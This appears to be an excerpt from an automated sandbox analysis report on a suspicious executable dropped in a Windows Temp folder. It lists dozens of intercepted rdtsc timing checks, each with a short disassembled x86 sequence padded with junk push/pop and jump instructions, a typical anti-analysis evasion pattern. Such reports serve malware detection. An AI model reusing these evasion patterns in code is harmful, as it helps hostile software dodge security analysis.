                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 544025 second address: 544040 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F29F0C5275Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5494C5 second address: 5494D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29F0CD52A0h 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5494D9 second address: 5494DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 548566 second address: 54856A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54856A second address: 5485DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F29F0C52758h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 mov dword ptr fs:[00000000h], esp 0x0000002f mov edi, dword ptr [ebp+122D2662h] 0x00000035 mov eax, dword ptr [ebp+122D0989h] 0x0000003b push 00000000h 0x0000003d push ebx 0x0000003e call 00007F29F0C52758h 0x00000043 pop ebx 0x00000044 mov dword ptr [esp+04h], ebx 0x00000048 add dword ptr [esp+04h], 00000014h 0x00000050 inc ebx 0x00000051 push ebx 0x00000052 ret 0x00000053 pop ebx 0x00000054 ret 0x00000055 and bx, BCF2h 0x0000005a push FFFFFFFFh 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 pushad 0x00000061 popad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5485DB second address: 5485E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54A40F second address: 54A42F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a cmc 0x0000000b mov bl, C5h 0x0000000d push 00000000h 0x0000000f mov bx, 729Dh 0x00000013 push 00000000h 0x00000015 or dword ptr [ebp+122D39A8h], ebx 0x0000001b xchg eax, esi 0x0000001c pushad 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54A42F second address: 54A43C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F29F0CD5296h 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54A43C second address: 54A440 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54B1AD second address: 54B201 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, dword ptr [ebp+122D2B77h] 0x00000012 push 00000000h 0x00000014 mov edi, dword ptr [ebp+122D2A2Fh] 0x0000001a push 00000000h 0x0000001c jmp 00007F29F0CD529Ch 0x00000021 push eax 0x00000022 jp 00007F29F0CD52C8h 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F29F0CD52A8h 0x0000002f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54C1B1 second address: 54C1B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54C1B5 second address: 54C1BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54D367 second address: 54D36B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54D36B second address: 54D371 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54D371 second address: 54D398 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F29F0C52765h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007F29F0C52756h 0x00000017 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54F108 second address: 54F132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 ja 00007F29F0CD5296h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F29F0CD52A7h 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 55006D second address: 550071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 550071 second address: 550075 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 550075 second address: 55007B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 55007B second address: 550080 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 550080 second address: 5500A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C5275Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jnp 00007F29F0C52756h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 54F394 second address: 54F399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5520E1 second address: 5520E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5520E5 second address: 552111 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F29F0CD529Ah 0x0000000d push ecx 0x0000000e jmp 00007F29F0CD52A0h 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 je 00007F29F0CD5296h 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 55278D second address: 552791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 552791 second address: 5527A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b jg 00007F29F0CD5296h 0x00000011 pop esi 0x00000012 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 554872 second address: 554898 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52763h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F29F0C52758h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58BB29 second address: 58BB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58BB31 second address: 58BB3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58BB3F second address: 58BB55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnc 00007F29F0C52756h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58BB55 second address: 58BB59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590A27 second address: 590A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590A2D second address: 590A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A2h 0x00000007 jmp 00007F29F0CD529Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnl 00007F29F0CD5296h 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590A55 second address: 590A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58FD74 second address: 58FD78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 58FD78 second address: 58FD96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F29F0C5276Ch 0x0000000c jmp 00007F29F0C52760h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5902AA second address: 5902E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD529Eh 0x00000007 jmp 00007F29F0CD52A2h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29F0CD52A8h 0x00000015 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5902E8 second address: 5902EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590422 second address: 590436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jg 00007F29F0CD5296h 0x0000000b jl 00007F29F0CD5296h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590436 second address: 590462 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0C52763h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F29F0C52763h 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 590462 second address: 590491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD52A3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F29F0CD52A2h 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5950F3 second address: 595113 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F29F0C52756h 0x00000008 jmp 00007F29F0C52766h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5947D4 second address: 5947DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5947DA second address: 5947DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5947DF second address: 5947EF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pop eax 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594976 second address: 594986 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F29F0C52756h 0x00000010 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594DAF second address: 594DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594DB7 second address: 594E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0C52767h 0x0000000a push ebx 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d jmp 00007F29F0C52769h 0x00000012 pop ebx 0x00000013 ja 00007F29F0C52758h 0x00000019 popad 0x0000001a jbe 00007F29F0C52776h 0x00000020 jo 00007F29F0C5275Ch 0x00000026 jng 00007F29F0C52756h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594E0F second address: 594E15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 594E15 second address: 594E19 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A595 second address: 59A5CA instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29F0CD5296h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 push eax 0x00000011 jno 00007F29F0CD5296h 0x00000017 pop eax 0x00000018 jmp 00007F29F0CD52A6h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 pop esi 0x00000024 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A724 second address: 59A747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push edx 0x00000007 pop edx 0x00000008 jmp 00007F29F0C52767h 0x0000000d push esi 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A747 second address: 59A77B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F29F0CD52A4h 0x0000000a jl 00007F29F0CD5298h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F29F0CD529Eh 0x0000001c rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A77B second address: 59A785 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F29F0C52756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A785 second address: 59A7A7 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F29F0CD52ADh 0x00000008 js 00007F29F0CD5296h 0x0000000e jmp 00007F29F0CD52A1h 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A926 second address: 59A92A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A92A second address: 59A92E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A92E second address: 59A937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A937 second address: 59A94C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0CD529Dh 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59A94C second address: 59A96F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007F29F0C52767h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AB01 second address: 59AB05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AC79 second address: 59AC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F29F0C5275Ch 0x00000009 jg 00007F29F0C52756h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 js 00007F29F0C52756h 0x00000018 push ebx 0x00000019 pop ebx 0x0000001a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 545E7C second address: 545EA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F29F0CD529Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59ADCD second address: 59ADD7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F29F0C52756h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AF33 second address: 59AF56 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F29F0CD52AAh 0x00000008 jmp 00007F29F0CD52A2h 0x0000000d push esi 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AF56 second address: 59AF5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59AF5A second address: 59AF64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F29F0CD5296h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA10 second address: 59BA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA14 second address: 59BA28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F29F0CD5296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F29F0CD5296h 0x00000014 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA28 second address: 59BA2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA2E second address: 59BA34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA34 second address: 59BA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 59BA38 second address: 59BA50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29F0CD52A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                                    Source: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXERDTSC instruction interceptor: First address: 5A4236 second address: 5A423C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
